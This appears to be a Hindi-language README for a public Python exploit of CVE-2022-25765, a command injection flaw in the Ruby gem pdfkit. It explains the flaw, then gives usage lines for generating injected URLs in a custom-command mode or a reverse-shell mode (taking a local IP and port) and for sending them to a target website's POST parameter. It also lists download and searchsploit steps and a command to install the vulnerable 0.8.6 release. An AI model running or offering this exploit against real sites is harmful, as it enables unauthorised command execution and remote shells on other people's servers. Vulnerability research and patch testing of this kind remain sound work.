
CVE-2022–25765 (pdfkit) के लिए शोषण - कमांड इंजेक्शन

यह रिपॉजिटरी पसंद है? हमें ⭐ दें!
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।
@UNICORDev द्वारा (@NicPWNs और @Dev-Yeoj)
pdfkit पैकेज 0.0.0 से कमांड इंजेक्शन के लिए असुरक्षित है जहां URL को ठीक से सैनिटाइज़ नहीं किया जाता है।
एक रूबी जेम pdfkit आमतौर पर वेबसाइटों या HTML को PDF दस्तावेज़ों में बदलने के लिए उपयोग किया जाता है। इस सॉफ्टवेयर के असुरक्षित संस्करण (< 0.8.7.2) को एक विशेष रूप से तैयार किया गया URL दिया जा सकता है जिसमें एक कमांड होता है जो निष्पादित किया जाएगा। यह एक्सप्लॉइट निष्पादन योग्य URL उत्पन्न करता है या उन्हें pdfkit चलाने वाली असुरक्षित वेबसाइट पर भेजता है।
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c कस्टम कमांड मोड। कस्टम पेलोड उत्पन्न करने के लिए कमांड प्रदान करें।
-s रिवर्स शैल मोड। रिवर्स शैल पेलोड उत्पन्न करने के लिए स्थानीय IP और पोर्ट प्रदान करें।
-w असुरक्षित pdfkit चलाने वाली वेबसाइट का URL। (वैकल्पिक)
-p असुरक्षित pdfkit चलाने वाली वेबसाइट पर POST पैरामीटर। (वैकल्पिक)
-h यह सहायता मेनू दिखाएं।
GitHub से exploit-CVE-2022-25765.py डाउनलोड करें
ExploitDB से exploit-CVE-2022-25765.py डाउनलोड करें
searchsploit -u
searchsploit -m 51293


pdfkit Version 0.8.6
pdfkit Versions < 0.8.7.2
gem install pdfkit -v 0.8.6